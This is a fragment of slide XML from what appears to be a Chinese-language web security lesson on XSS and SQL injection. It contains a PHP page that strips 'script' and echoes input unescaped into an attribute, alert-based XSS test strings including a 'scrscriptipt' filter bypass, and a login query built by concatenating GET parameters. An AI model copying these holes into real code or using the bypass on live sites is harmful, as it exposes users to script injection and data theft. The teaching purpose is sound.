            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>script"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>""</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>,$str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"&lt;h2 align=center&gt;Hello "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>($str).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>".&lt;/h2&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>'&lt;center&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;form action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> method=GET&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;input type=submit name=submit value=Submit /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;input name=keyword value="'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>.$str2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>’”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/center&gt;’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB11E7B9-513C-89FD-EBBD-5FFC9B306E41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="796462" y="1082970"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1744865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用浏览器访问</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test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4176597D-DE32-7907-96AD-7372E2E7E786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831932" y="2418818"/>
            <a:ext cx="6528135" cy="2489328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="458983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&lt;script&gt;alert("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");&lt;/script&gt;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3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F3D997-7FFE-33F1-D10C-3B6CB54CA70B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831932" y="2348880"/>
            <a:ext cx="6528135" cy="2489328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="588819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41852"/>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输入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&lt;script&gt;alert("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xss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");&lt;/script&gt;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8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4067DDDC-5298-EB91-578D-14FE65541CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831932" y="2435955"/>
            <a:ext cx="6528135" cy="2489328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4175550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28905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右键查看源码：</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发现</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script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字符串被过滤。</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3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A85273D-FDE9-5455-6ADB-68AEA1AE1B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="884690" y="2210778"/>
            <a:ext cx="10422619" cy="3220277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4007587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41852"/>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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>scrscriptipt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&gt;alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>");&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>scrscriptipt</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8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA1EC1E-F4B3-EA6D-0D66-E86374038262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831932" y="2392025"/>
            <a:ext cx="6528135" cy="2489328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370412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6" y="1118601"/>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客户端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{834F9780-0674-44A0-FF7F-C80FD400A950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788302" y="1646353"/>
            <a:ext cx="5104570" cy="3176960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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&lt;form</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action</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"login.php"</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method</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"GET"</a:t>
            </a:r>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"text"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name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"user"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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"text"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name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"passwd"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/&gt;       </a:t>
            </a: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"submit"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value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"submit"</a:t>
            </a:r>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&lt;/form&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当用户通过浏览器向表单提交了用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"bob"</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密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"abc123"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时，浏览器会向服务器发送请求：</a:t>
            </a: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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http://xxxx.com/login.php?user=bob&amp;passwd=abc123</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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384032" y="1118601"/>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服务端</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320831" y="1591585"/>
            <a:ext cx="5111750" cy="3485570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sql</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"select * from user where username = '"</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$_GET</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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"user"</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 and password = '"</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$_GET</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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"passwd"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$result</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$conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>query</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当</a:t>
            </a:r>
            <a:r>
